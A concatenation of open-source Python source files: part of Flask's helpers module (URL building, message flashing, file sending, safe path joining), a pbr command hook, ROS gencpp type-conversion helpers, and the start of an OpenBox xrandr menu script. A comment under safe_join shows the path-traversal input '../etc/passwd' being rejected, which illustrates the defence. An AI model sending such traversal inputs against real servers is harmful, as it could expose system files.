# Re-raise the BuildError, in context of original traceback.
exc_type, exc_value, tb = sys.exc_info()
if exc_value is error:
raise exc_type, exc_value, tb
else:
raise error
# url_for will use this result, instead of raising BuildError.
return url
app.build_error_handler = external_url_handler
Here, `error` is the instance of :exc:`~werkzeug.routing.BuildError`, and
`endpoint` and `**values` are the arguments passed into `url_for`. Note
that this is for building URLs outside the current application, and not for
handling 404 NotFound errors.
.. versionadded:: 0.10
The `_scheme` parameter was added.
.. versionadded:: 0.9
The `_anchor` and `_method` parameters were added.
.. versionadded:: 0.9
Calls :meth:`Flask.handle_build_error` on
:exc:`~werkzeug.routing.BuildError`.
:param endpoint: the endpoint of the URL (name of the function)
:param values: the variable arguments of the URL rule
:param _external: if set to `True`, an absolute URL is generated. Server
address can be changed via `SERVER_NAME` configuration variable which
defaults to `localhost`.
:param _scheme: a string specifying the desired URL scheme. The `_external`
parameter must be set to `True` or a `ValueError` is raised.
:param _anchor: if provided this is added as anchor to the URL.
:param _method: if provided this explicitly specifies an HTTP method.
"""
appctx = _app_ctx_stack.top
reqctx = _request_ctx_stack.top
if appctx is None:
raise RuntimeError('Attempted to generate a URL without the '
'application context being pushed. This has to be '
'executed when application context is available.')
# If request specific information is available we have some extra
# features that support "relative" urls.
if reqctx is not None:
url_adapter = reqctx.url_adapter
blueprint_name = request.blueprint
if not reqctx.request._is_old_module:
if endpoint[:1] == '.':
if blueprint_name is not None:
endpoint = blueprint_name + endpoint
else:
endpoint = endpoint[1:]
else:
# TODO: get rid of this deprecated functionality in 1.0
if '.' not in endpoint:
if blueprint_name is not None:
endpoint = blueprint_name + '.' + endpoint
elif endpoint.startswith('.'):
endpoint = endpoint[1:]
external = values.pop('_external', False)
# Otherwise go with the url adapter from the appctx and make
# the urls external by default.
else:
url_adapter = appctx.url_adapter
if url_adapter is None:
raise RuntimeError('Application was not able to create a URL '
'adapter for request independent URL generation. '
'You might be able to fix this by setting '
'the SERVER_NAME config variable.')
external = values.pop('_external', True)
anchor = values.pop('_anchor', None)
method = values.pop('_method', None)
scheme = values.pop('_scheme', None)
appctx.app.inject_url_defaults(endpoint, values)
if scheme is not None:
if not external:
raise ValueError('When specifying _scheme, _external must be True')
url_adapter.url_scheme = scheme
try:
rv = url_adapter.build(endpoint, values, method=method,
force_external=external)
except BuildError as error:
# We need to inject the values again so that the app callback can
# deal with that sort of stuff.
values['_external'] = external
values['_anchor'] = anchor
values['_method'] = method
return appctx.app.handle_url_build_error(error, endpoint, values)
if anchor is not None:
rv += '#' + url_quote(anchor)
return rv
def get_template_attribute(template_name, attribute):
"""Loads a macro (or variable) a template exports. This can be used to
invoke a macro from within Python code. If you for example have a
template named `_cider.html` with the following contents:
.. sourcecode:: html+jinja
{% macro hello(name) %}Hello {{ name }}!{% endmacro %}
You can access this from Python code like this::
hello = get_template_attribute('_cider.html', 'hello')
return hello('World')
.. versionadded:: 0.2
:param template_name: the name of the template
:param attribute: the name of the variable or macro to access
"""
return getattr(current_app.jinja_env.get_template(template_name).module,
attribute)
def flash(message, category='message'):
"""Flashes a message to the next request. In order to remove the
flashed message from the session and to display it to the user,
the template has to call :func:`get_flashed_messages`.
.. versionchanged:: 0.3
`category` parameter added.
:param message: the message to be flashed.
:param category: the category for the message. The following values
are recommended: ``'message'`` for any kind of message,
``'error'`` for errors, ``'info'`` for information
messages and ``'warning'`` for warnings. However any
kind of string can be used as category.
"""
# Original implementation:
#
# session.setdefault('_flashes', []).append((category, message))
#
# This assumed that changes made to mutable structures in the session are
# always in sync with the session object, which is not true for session
# implementations that use external storage for keeping their keys/values.
flashes = session.get('_flashes', [])
flashes.append((category, message))
session['_flashes'] = flashes
message_flashed.send(current_app._get_current_object(),
message=message, category=category)
def get_flashed_messages(with_categories=False, category_filter=[]):
"""Pulls all flashed messages from the session and returns them.
Further calls in the same request to the function will return
the same messages. By default just the messages are returned,
but when `with_categories` is set to `True`, the return value will
be a list of tuples in the form ``(category, message)`` instead.
Filter the flashed messages to one or more categories by providing those
categories in `category_filter`. This allows rendering categories in
separate html blocks. The `with_categories` and `category_filter`
arguments are distinct:
* `with_categories` controls whether categories are returned with message
text (`True` gives a tuple, where `False` gives just the message text).
* `category_filter` filters the messages down to only those matching the
provided categories.
See :ref:`message-flashing-pattern` for examples.
.. versionchanged:: 0.3
`with_categories` parameter added.
.. versionchanged:: 0.9
`category_filter` parameter added.
:param with_categories: set to `True` to also receive categories.
:param category_filter: whitelist of categories to limit return values
"""
flashes = _request_ctx_stack.top.flashes
if flashes is None:
_request_ctx_stack.top.flashes = flashes = session.pop('_flashes') \
if '_flashes' in session else []
if category_filter:
flashes = list(filter(lambda f: f[0] in category_filter, flashes))
if not with_categories:
return [x[1] for x in flashes]
return flashes
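# Illustrative only (requires an active request context; the message is
# flashed on one request and read on the next):
#
#     flash(u'Record saved', 'info')
#     get_flashed_messages()                           # [u'Record saved']
#     get_flashed_messages(with_categories=True)       # [('info', u'Record saved')]
#     get_flashed_messages(category_filter=['error'])  # []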
def send_file(filename_or_fp, mimetype=None, as_attachment=False,
attachment_filename=None, add_etags=True,
cache_timeout=None, conditional=False):
"""Sends the contents of a file to the client. This will use the
most efficient method available and configured. By default it will
try to use the WSGI server's file_wrapper support. Alternatively
you can set the application's :attr:`~Flask.use_x_sendfile` attribute
to ``True`` to directly emit an `X-Sendfile` header. This however
requires support of the underlying webserver for `X-Sendfile`.
By default it will try to guess the mimetype for you, but you can
also explicitly provide one. For extra security you probably want
to send certain files as attachment (HTML for instance). The mimetype
guessing requires a `filename` or an `attachment_filename` to be
provided.
Please never pass filenames to this function from user sources without
checking them first. Something like this is usually sufficient to
avoid security problems::
if '..' in filename or filename.startswith('/'):
abort(404)
.. versionadded:: 0.2
.. versionadded:: 0.5
The `add_etags`, `cache_timeout` and `conditional` parameters were
added. The default behavior is now to attach etags.
.. versionchanged:: 0.7
mimetype guessing and etag support for file objects was
deprecated because it was unreliable. Pass a filename if you are
able to, otherwise attach an etag yourself. This functionality
will be removed in Flask 1.0
.. versionchanged:: 0.9
cache_timeout pulls its default from application config, when None.
:param filename_or_fp: the filename of the file to send. This is
relative to the :attr:`~Flask.root_path` if a
relative path is specified.
Alternatively a file object might be provided
in which case `X-Sendfile` might not work and
fall back to the traditional method. Make sure
that the file pointer is positioned at the start
of data to send before calling :func:`send_file`.
:param mimetype: the mimetype of the file if provided, otherwise
auto detection happens.
:param as_attachment: set to `True` if you want to send this file with
a ``Content-Disposition: attachment`` header.
:param attachment_filename: the filename for the attachment if it
differs from the file's filename.
:param add_etags: set to `False` to disable attaching of etags.
:param conditional: set to `True` to enable conditional responses.
:param cache_timeout: the timeout in seconds for the headers. When `None`
(default), this value is set by
:meth:`~Flask.get_send_file_max_age` of
:data:`~flask.current_app`.
"""
mtime = None
if isinstance(filename_or_fp, string_types):
filename = filename_or_fp
file = None
else:
from warnings import warn
file = filename_or_fp
filename = getattr(file, 'name', None)
# XXX: this behavior is now deprecated because it was unreliable.
# removed in Flask 1.0
if not attachment_filename and not mimetype \
and isinstance(filename, string_types):
warn(DeprecationWarning('The filename support for file objects '
'passed to send_file is now deprecated. Pass an '
'attachment_filename if you want mimetypes to be guessed.'),
stacklevel=2)
if add_etags:
warn(DeprecationWarning('In future flask releases etags will no '
'longer be generated for file objects passed to the send_file '
'function because this behavior was unreliable. Pass '
'filenames instead if possible, otherwise attach an etag '
'yourself based on another value'), stacklevel=2)
if filename is not None:
if not os.path.isabs(filename):
filename = os.path.join(current_app.root_path, filename)
if mimetype is None and (filename or attachment_filename):
mimetype = mimetypes.guess_type(filename or attachment_filename)[0]
if mimetype is None:
mimetype = 'application/octet-stream'
headers = Headers()
if as_attachment:
if attachment_filename is None:
if filename is None:
raise TypeError('filename unavailable, required for '
'sending as attachment')
attachment_filename = os.path.basename(filename)
headers.add('Content-Disposition', 'attachment',
filename=attachment_filename)
if current_app.use_x_sendfile and filename:
if file is not None:
file.close()
headers['X-Sendfile'] = filename
headers['Content-Length'] = os.path.getsize(filename)
data = None
else:
if file is None:
file = open(filename, 'rb')
mtime = os.path.getmtime(filename)
headers['Content-Length'] = os.path.getsize(filename)
data = wrap_file(request.environ, file)
rv = current_app.response_class(data, mimetype=mimetype, headers=headers,
direct_passthrough=True)
# if we know the file modification date, we can store it as
# the time of the last modification.
if mtime is not None:
rv.last_modified = int(mtime)
rv.cache_control.public = True
if cache_timeout is None:
cache_timeout = current_app.get_send_file_max_age(filename)
if cache_timeout is not None:
rv.cache_control.max_age = cache_timeout
rv.expires = int(time() + cache_timeout)
if add_etags and filename is not None:
rv.set_etag('flask-%s-%s-%s' % (
os.path.getmtime(filename),
os.path.getsize(filename),
adler32(
filename.encode('utf-8') if isinstance(filename, text_type)
else filename
) & 0xffffffff
))
if conditional:
rv = rv.make_conditional(request)
# make sure we don't send x-sendfile for servers that
# ignore the 304 status code for x-sendfile.
if rv.status_code == 304:
rv.headers.pop('x-sendfile', None)
return rv
def safe_join(directory, filename):
"""Safely join `directory` and `filename`.
Example usage::
@app.route('/wiki/<path:filename>')
def wiki_page(filename):
filename = safe_join(app.config['WIKI_FOLDER'], filename)
with open(filename, 'rb') as fd:
content = fd.read() # Read and process the file content...
:param directory: the base directory.
:param filename: the untrusted filename relative to that directory.
:raises: :class:`~werkzeug.exceptions.NotFound` if the resulting path
would fall out of `directory`.
"""
filename = posixpath.normpath(filename)
for sep in _os_alt_seps:
if sep in filename:
raise NotFound()
if os.path.isabs(filename) or \
filename == '..' or \
filename.startswith('../'):
raise NotFound()
return os.path.join(directory, filename)
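# Illustrative: traversal attempts are rejected, e.g.
#
#     safe_join('/var/www', 'index.html')     # -> '/var/www/index.html'
#     safe_join('/var/www', '../etc/passwd')  # raises NotFound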
def send_from_directory(directory, filename, **options):
"""Send a file from a given directory with :func:`send_file`. This
is a secure way to quickly expose static files from an upload folder
or something similar.
Example usage::
@app.route('/uploads/<path:filename>')
def download_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'],
filename, as_attachment=True)
.. admonition:: Sending files and Performance
It is strongly recommended to activate either `X-Sendfile` support in
your webserver or (if no authentication happens) to tell the webserver
to serve files for the given path on its own without calling into the
web application for improved performance.
.. versionadded:: 0.5
:param directory: the directory where all the files are stored.
:param filename: the filename relative to that directory to
download.
:param options: optional keyword arguments that are directly
forwarded to :func:`send_file`.
"""
filename = safe_join(directory, filename)
if not os.path.isfile(filename):
raise NotFound()
options.setdefault('conditional', True)
return send_file(filename, **options)
def get_root_path(import_name):
"""Returns the path to a package or cwd if that cannot be found. This
returns the path of a package or the folder that contains a module.
Not to be confused with the package path returned by :func:`find_package`.
"""
# Module already imported and has a file attribute. Use that first.
mod = sys.modules.get(import_name)
if mod is not None and hasattr(mod, '__file__'):
return os.path.dirname(os.path.abspath(mod.__file__))
# Next attempt: check the loader.
loader = pkgutil.get_loader(import_name)
# Loader does not exist or we're referring to an unloaded main module
# or a main module without path (interactive sessions), go with the
# current working directory.
if loader is None or import_name == '__main__':
return os.getcwd()
# For .egg, zipimporter does not have get_filename until Python 2.7.
# Some other loaders might exhibit the same behavior.
if hasattr(loader, 'get_filename'):
filepath = loader.get_filename(import_name)
else:
# Fall back to imports.
__import__(import_name)
filepath = sys.modules[import_name].__file__
# filepath is import_name.py for a module, or __init__.py for a package.
return os.path.dirname(os.path.abspath(filepath))
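# Illustrative usage:
#
#     root = get_root_path('flask')   # directory containing flask/__init__.py
#     assert os.path.isdir(root)      # for '__main__' without a loader, falls back to os.getcwd()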
def find_package(import_name):
"""Finds a package and returns the prefix (or None if the package is
not installed) as well as the folder that contains the package or
module as a tuple. The package path returned is the module that would
have to be added to the pythonpath in order to make it possible to
import the module. The prefix is the path below which a UNIX like
folder structure exists (lib, share etc.).
"""
root_mod_name = import_name.split('.')[0]
loader = pkgutil.get_loader(root_mod_name)
if loader is None or import_name == '__main__':
# import name is not found, or interactive/main module
package_path = os.getcwd()
else:
# For .egg, zipimporter does not have get_filename until Python 2.7.
if hasattr(loader, 'get_filename'):
filename = loader.get_filename(root_mod_name)
elif hasattr(loader, 'archive'):
# zipimporter's loader.archive points to the .egg or .zip
# archive filename is dropped in call to dirname below.
filename = loader.archive
else:
# At least one loader is missing both get_filename and archive:
# Google App Engine's HardenedModulesHook
#
# Fall back to imports.
__import__(import_name)
filename = sys.modules[import_name].__file__
package_path = os.path.abspath(os.path.dirname(filename))
# package_path ends with __init__.py for a package
if loader.is_package(root_mod_name):
package_path = os.path.dirname(package_path)
site_parent, site_folder = os.path.split(package_path)
py_prefix = os.path.abspath(sys.prefix)
if package_path.startswith(py_prefix):
return py_prefix, package_path
elif site_folder.lower() == 'site-packages':
parent, folder = os.path.split(site_parent)
# Windows like installations
if folder.lower() == 'lib':
base_dir = parent
# UNIX like installations
elif os.path.basename(parent).lower() == 'lib':
base_dir = os.path.dirname(parent)
else:
base_dir = site_parent
return base_dir, package_path
return None, package_path
class locked_cached_property(object):
"""A decorator that converts a function into a lazy property. The
function wrapped is called the first time to retrieve the result
and then that calculated result is used the next time you access
the value. Works like the one in Werkzeug but has a lock for
thread safety.
"""
def __init__(self, func, name=None, doc=None):
self.__name__ = name or func.__name__
self.__module__ = func.__module__
self.__doc__ = doc or func.__doc__
self.func = func
self.lock = RLock()
def __get__(self, obj, type=None):
if obj is None:
return self
with self.lock:
value = obj.__dict__.get(self.__name__, _missing)
if value is _missing:
value = self.func(obj)
obj.__dict__[self.__name__] = value
return value
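# Illustrative only (expensive_lookup is a hypothetical helper): the wrapped
# function runs once per instance; later accesses return the value cached in
# the instance __dict__, with the lock guarding the first computation.
#
#     class Service(object):
#         @locked_cached_property
#         def token(self):
#             return expensive_lookup()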
class _PackageBoundObject(object):
def __init__(self, import_name, template_folder=None):
#: The name of the package or module. Do not change this once
#: it was set by the constructor.
self.import_name = import_name
#: location of the templates. `None` if templates should not be
#: exposed.
self.template_folder = template_folder
#: Where is the app root located?
self.root_path = get_root_path(self.import_name)
self._static_folder = None
self._static_url_path = None
def _get_static_folder(self):
if self._static_folder is not None:
return os.path.join(self.root_path, self._static_folder)
def _set_static_folder(self, value):
self._static_folder = value
static_folder = property(_get_static_folder, _set_static_folder)
del _get_static_folder, _set_static_folder
def _get_static_url_path(self):
if self._static_url_path is None:
if self.static_folder is None:
return None
return '/' + os.path.basename(self.static_folder)
return self._static_url_path
def _set_static_url_path(self, value):
self._static_url_path = value
static_url_path = property(_get_static_url_path, _set_static_url_path)
del _get_static_url_path, _set_static_url_path
@property
def has_static_folder(self):
"""This is `True` if the package bound object's container has a
folder named ``'static'``.
.. versionadded:: 0.5
"""
return self.static_folder is not None
@locked_cached_property
def jinja_loader(self):
"""The Jinja loader for this package bound object.
.. versionadded:: 0.5
"""
if self.template_folder is not None:
return FileSystemLoader(os.path.join(self.root_path,
self.template_folder))
def get_send_file_max_age(self, filename):
"""Provides default cache_timeout for the :func:`send_file` functions.
By default, this function returns ``SEND_FILE_MAX_AGE_DEFAULT`` from
the configuration of :data:`~flask.current_app`.
Static file functions such as :func:`send_from_directory` use this
function, and :func:`send_file` calls this function on
:data:`~flask.current_app` when the given cache_timeout is `None`. If a
cache_timeout is given in :func:`send_file`, that timeout is used;
otherwise, this method is called.
This allows subclasses to change the behavior when sending files based
on the filename. For example, to set the cache timeout for .js files
to 60 seconds::
class MyFlask(flask.Flask):
def get_send_file_max_age(self, name):
if name.lower().endswith('.js'):
return 60
return flask.Flask.get_send_file_max_age(self, name)
.. versionadded:: 0.9
"""
return current_app.config['SEND_FILE_MAX_AGE_DEFAULT']
def send_static_file(self, filename):
"""Function used internally to send static files from the static
folder to the browser.
.. versionadded:: 0.5
"""
if not self.has_static_folder:
raise RuntimeError('No static folder for this object')
# Ensure get_send_file_max_age is called in all cases.
# Here, we ensure get_send_file_max_age is called for Blueprints.
cache_timeout = self.get_send_file_max_age(filename)
return send_from_directory(self.static_folder, filename,
cache_timeout=cache_timeout)
def open_resource(self, resource, mode='rb'):
"""Opens a resource from the application's resource folder. To see
how this works, consider the following folder structure::
/myapplication.py
/schema.sql
/static
/style.css
/templates
/layout.html
/index.html
If you want to open the `schema.sql` file you would do the
following::
with app.open_resource('schema.sql') as f:
contents = f.read()
do_something_with(contents)
:param resource: the name of the resource. To access resources within
subfolders use forward slashes as separator.
:param mode: resource file opening mode, default is 'rb'.
"""
if mode not in ('r', 'rb'):
raise ValueError('Resources can only be opened for reading')
return open(os.path.join(self.root_path, resource), mode)
| apache-2.0 |
swarna-k/MyDiary | flask/lib/python2.7/site-packages/pbr/hooks/commands.py | 10 | 2346 |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from setuptools.command import easy_install
from pbr.hooks import base
from pbr import options
from pbr import packaging
class CommandsConfig(base.BaseConfig):
section = 'global'
def __init__(self, config):
super(CommandsConfig, self).__init__(config)
self.commands = self.config.get('commands', "")
def save(self):
self.config['commands'] = self.commands
super(CommandsConfig, self).save()
def add_command(self, command):
self.commands = "%s\n%s" % (self.commands, command)
def hook(self):
self.add_command('pbr.packaging.LocalEggInfo')
self.add_command('pbr.packaging.LocalSDist')
self.add_command('pbr.packaging.LocalInstallScripts')
self.add_command('pbr.packaging.LocalDevelop')
if os.name != 'nt':
easy_install.get_script_args = packaging.override_get_script_args
if packaging.have_sphinx():
self.add_command('pbr.builddoc.LocalBuildDoc')
self.add_command('pbr.builddoc.LocalBuildLatex')
if os.path.exists('.testr.conf') and packaging.have_testr():
# There is a .testr.conf file. We want to use it.
self.add_command('pbr.packaging.TestrTest')
elif self.config.get('nosetests', False) and packaging.have_nose():
# We seem to still have nose configured
self.add_command('pbr.packaging.NoseTest')
use_egg = options.get_boolean_option(
self.pbr_config, 'use-egg', 'PBR_USE_EGG')
# We always want non-egg install unless explicitly requested
if 'manpages' in self.pbr_config or not use_egg:
self.add_command('pbr.packaging.LocalInstall')
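# Illustrative: add_command joins entries with newline separators, so after
#
#     self.add_command('pbr.packaging.LocalEggInfo')
#     self.add_command('pbr.packaging.LocalSDist')
#
# starting from commands == '', self.commands is
# '\npbr.packaging.LocalEggInfo\npbr.packaging.LocalSDist'.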
| bsd-3-clause |
Princeton-Quadcopter/PQ-Software | Ardupilot/mk/PX4/Tools/gencpp/src/gencpp/__init__.py | 214 | 9473 |
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import genmsg.msgs
try:
from cStringIO import StringIO #Python 2.x
except ImportError:
from io import StringIO #Python 3.x
MSG_TYPE_TO_CPP = {'byte': 'int8_t',
'char': 'uint8_t',
'bool': 'uint8_t',
'uint8': 'uint8_t',
'int8': 'int8_t',
'uint16': 'uint16_t',
'int16': 'int16_t',
'uint32': 'uint32_t',
'int32': 'int32_t',
'uint64': 'uint64_t',
'int64': 'int64_t',
'float32': 'float',
'float64': 'double',
'string': 'std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > ',
'time': 'ros::Time',
'duration': 'ros::Duration'}
#used
def msg_type_to_cpp(type):
"""
Converts a message type (e.g. uint32, std_msgs/String, etc.) into the C++ declaration
for that type (e.g. uint32_t, std_msgs::String_<ContainerAllocator>)
@param type: The message type
@type type: str
@return: The C++ declaration
@rtype: str
"""
(base_type, is_array, array_len) = genmsg.msgs.parse_type(type)
cpp_type = None
if (genmsg.msgs.is_builtin(base_type)):
cpp_type = MSG_TYPE_TO_CPP[base_type]
elif (len(base_type.split('/')) == 1):
if (genmsg.msgs.is_header_type(base_type)):
cpp_type = ' ::std_msgs::Header_<ContainerAllocator> '
else:
cpp_type = '%s_<ContainerAllocator> '%(base_type)
else:
pkg = base_type.split('/')[0]
msg = base_type.split('/')[1]
cpp_type = ' ::%s::%s_<ContainerAllocator> '%(pkg, msg)
if (is_array):
if (array_len is None):
return 'std::vector<%s, typename ContainerAllocator::template rebind<%s>::other > '%(cpp_type, cpp_type)
else:
return 'boost::array<%s, %s> '%(cpp_type, array_len)
else:
return cpp_type
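# Illustrative examples:
#
#     msg_type_to_cpp('uint32')           # -> 'uint32_t'
#     msg_type_to_cpp('std_msgs/String')  # -> ' ::std_msgs::String_<ContainerAllocator> '
#     msg_type_to_cpp('uint8[16]')        # -> 'boost::array<uint8_t, 16> '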
def _escape_string(s):
s = s.replace('\\', '\\\\')
s = s.replace('"', '\\"')
return s
def escape_message_definition(definition):
lines = definition.splitlines()
if not lines:
lines.append('')
s = StringIO()
for line in lines:
line = _escape_string(line)
s.write('%s\\n\\\n'%(line))
val = s.getvalue()
s.close()
return val
#used2
def cpp_message_declarations(name_prefix, msg):
"""
Returns the different possible C++ declarations for a message given the message itself.
@param name_prefix: The C++ prefix to be prepended to the name, e.g. "std_msgs::"
@type name_prefix: str
@param msg: The message type
@type msg: str
@return: A tuple of 3 different names. cpp_message_declarations("std_msgs::", "String") returns the tuple
("std_msgs::String_", "std_msgs::String_<ContainerAllocator>", "std_msgs::String")
@rtype: (str, str, str)
"""
pkg, basetype = genmsg.names.package_resource_name(msg)
cpp_name = ' ::%s%s'%(name_prefix, msg)
if (pkg):
cpp_name = ' ::%s::%s'%(pkg, basetype)
return ('%s_'%(cpp_name), '%s_<ContainerAllocator> '%(cpp_name), '%s'%(cpp_name))
#todo
def is_fixed_length(spec, msg_context, includepath):
"""
Returns whether or not the message is fixed-length
@param spec: The message spec
@type spec: genmsg.msgs.MsgSpec
@param msg_context: The message context used to resolve dependent message types
@type msg_context: genmsg.msg_loader.MsgContext
@param includepath: Mapping of package names to include paths for dependent messages
@type includepath: dict
"""
types = []
for field in spec.parsed_fields():
if (field.is_array and field.array_len is None):
return False
if (field.base_type == 'string'):
return False
if (not field.is_builtin):
types.append(field.base_type)
types = set(types)
for t in types:
t = genmsg.msgs.resolve_type(t, spec.package)
assert isinstance(includepath, dict)
new_spec = genmsg.msg_loader.load_msg_by_type(msg_context, t, includepath)
if (not is_fixed_length(new_spec, msg_context, includepath)):
return False
return True
#used2
def default_value(type):
"""
Returns the value to initialize a message member with. 0 for integer types, 0.0 for floating point, false for bool,
empty string for everything else
@param type: The type
@type type: str
"""
if type in ['byte', 'int8', 'int16', 'int32', 'int64',
'char', 'uint8', 'uint16', 'uint32', 'uint64']:
return '0'
elif type in ['float32', 'float64']:
return '0.0'
elif type == 'bool':
return 'false'
return ""
#used2
def takes_allocator(type):
"""
Returns whether or not a type can take an allocator in its constructor. False for all builtin types except string.
True for all others.
@param type: The type
    @type type: str
"""
    return type not in ['byte', 'int8', 'int16', 'int32', 'int64',
'char', 'uint8', 'uint16', 'uint32', 'uint64',
'float32', 'float64', 'bool', 'time', 'duration']
def escape_string(s):
    s = s.replace('\\', '\\\\')
    s = s.replace('"', '\\"')
    return s
#used
def generate_fixed_length_assigns(spec, container_gets_allocator, cpp_name_prefix):
"""
    Yields the statements that initialize any fixed-length arrays
@param spec: The message spec
@type spec: genmsg.msgs.MsgSpec
@param container_gets_allocator: Whether or not a container type (whether it's another message, a vector, array or string)
should have the allocator passed to its constructor. Assumes the allocator is named _alloc.
@type container_gets_allocator: bool
@param cpp_name_prefix: The C++ prefix to use when referring to the message, e.g. "std_msgs::"
@type cpp_name_prefix: str
"""
# Assign all fixed-length arrays their default values
for field in spec.parsed_fields():
if (not field.is_array or field.array_len is None):
continue
val = default_value(field.base_type)
if (container_gets_allocator and takes_allocator(field.base_type)):
# String is a special case, as it is the only builtin type that takes an allocator
if (field.base_type == "string"):
string_cpp = msg_type_to_cpp("string")
yield ' %s.assign(%s(_alloc));\n'%(field.name, string_cpp)
else:
(cpp_msg_unqualified, cpp_msg_with_alloc, _) = cpp_message_declarations(cpp_name_prefix, field.base_type)
yield ' %s.assign(%s(_alloc));\n'%(field.name, cpp_msg_with_alloc)
elif (len(val) > 0):
yield ' %s.assign(%s);\n'%(field.name, val)
#used
def generate_initializer_list(spec, container_gets_allocator):
"""
    Yields the lines of the initializer list for a constructor
@param spec: The message spec
@type spec: genmsg.msgs.MsgSpec
@param container_gets_allocator: Whether or not a container type (whether it's another message, a vector, array or string)
should have the allocator passed to its constructor. Assumes the allocator is named _alloc.
@type container_gets_allocator: bool
"""
op = ':'
for field in spec.parsed_fields():
val = default_value(field.base_type)
use_alloc = takes_allocator(field.base_type)
if (field.is_array):
if (field.array_len is None and container_gets_allocator):
yield ' %s %s(_alloc)'%(op, field.name)
else:
yield ' %s %s()'%(op, field.name)
else:
if (container_gets_allocator and use_alloc):
yield ' %s %s(_alloc)'%(op, field.name)
else:
yield ' %s %s(%s)'%(op, field.name, val)
op = ','
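# Illustrative output of generate_initializer_list (hypothetical message with
# fields 'uint32 seq' and 'string frame_id', container_gets_allocator=True):
#   : seq(0)
#   , frame_id(_alloc)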
|
gpl-3.0
|
whiteinge/ob-randr
|
ob-randr.py
|
2
|
8035
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""A small utility to make xrandr adjustments from an OpenBox menu.
To install, put this file somewhere and make sure it is executable.
Edit your $HOME/.config/openbox/menu.xml file. Add something like the following
near the top::
<menu id="randr-menu" label="randr" execute="/path/to/ob-randr.py" />
Then add this in the place you actually want the menu to appear::
<menu id="randr-menu" />
You can easily add custom commands to the menu by creating the file
$HOME/.ob-randrrc. The syntax looks like this::
[Notebook]
portrait: --output LVDS --primary --mode 1366x768 --output VGA-0 --mode 1440x900 --left-of LVDS --rotate left
[Netbook]
zoom out: --output LVDS --scale 1.3x1.3
zoom in: --output LVDS --panning 1280x1024
The idea is that you can create machine-specific shortcuts. For example, with
my laptop at home I frequently connect to an external widescreen display turned
sideways. On my netbook, I frequently 'zoom out' to a higher resolution in
scaled-out mode or 'zoom in' to a higher resolution in panning mode.
TODO:
* Invoking position commands on a monitor that is turned off has no effect
* What other common tasks should be represented?
"""
AUTHOR = 'Seth House <[email protected]>, Petr Penzin <[email protected]>'
VERSION = '0.2'
import ConfigParser
import os
import subprocess
import sys
try:
from xml.etree import cElementTree as etree
except ImportError:
from xml.etree import ElementTree as etree
HOME = os.path.expanduser('~')
RCFILE = '.ob-randrrc'
def mk_exe_node(output, name, command):
"""A small helper to speed the three-element PITA that is the OpenBox
execute menu syntax.
"""
CMD = 'xrandr --output %s ' % output
item = etree.Element('item', label=name)
action = etree.SubElement(item, 'action', name='execute')
etree.SubElement(action, 'command').text = CMD + command
return item
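# Illustrative result (assumed arguments), once serialized with etree.tostring():
#   mk_exe_node('LVDS', 'off', '--off') ->
#     <item label="off">
#       <action name="execute"><command>xrandr --output LVDS --off</command></action>
#     </item>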
def get_rc_menu():
"""Read the user's rc file and return XML for menu entries."""
config = ConfigParser.ConfigParser()
config.read(os.path.join(HOME, RCFILE))
menus = []
for i in config.sections():
menu = etree.Element('menu', id='shortcut-%s' % i, label=i)
for name in config.options(i):
command = config.get(i, name)
item = etree.SubElement(menu, 'item', label=name)
action = etree.SubElement(item, 'action', name='execute')
etree.SubElement(action, 'command').text = 'xrandr ' + command
menus.append(menu)
return menus
def mk_position_controls(output, name, action, outputs):
"""A helper function to generate a menu containing set of positional commands (left of, right of, above, below, etc).
"""
menu = etree.Element('menu', id=output+action,
type=action, label=name)
empty = True
# Add --auto to turn the screen on if it is off
if outputs[output]:
extra_action = ''
else:
extra_action = '--auto'
for other in outputs.keys():
# Don't position against itself
if output == other:
continue
# Don't position against an output that is off
if not outputs[other]:
continue
menu.append(mk_exe_node(output, other, ' '.join([extra_action, action, other])))
empty = False
if empty:
etree.SubElement(menu, 'separator', label="<none>")
return menu
def get_xml():
"""Run xrandr -q and parse the output for the bits we're interested in,
then build an XML tree suitable for passing to OpenBox.
"""
xrandr = subprocess.Popen(['xrandr', '-q'], stdout=subprocess.PIPE)
xrandr_lines = xrandr.stdout.readlines()
root = etree.Element('openbox_pipe_menu')
# Dictionary of connected outputs, key - output name, value - is it on
outputs = {}
actions = (
('right', '--rotate right'),
('left', '--rotate left'),
('inverted', '--rotate inverted'),
('normal', '--rotate normal'),
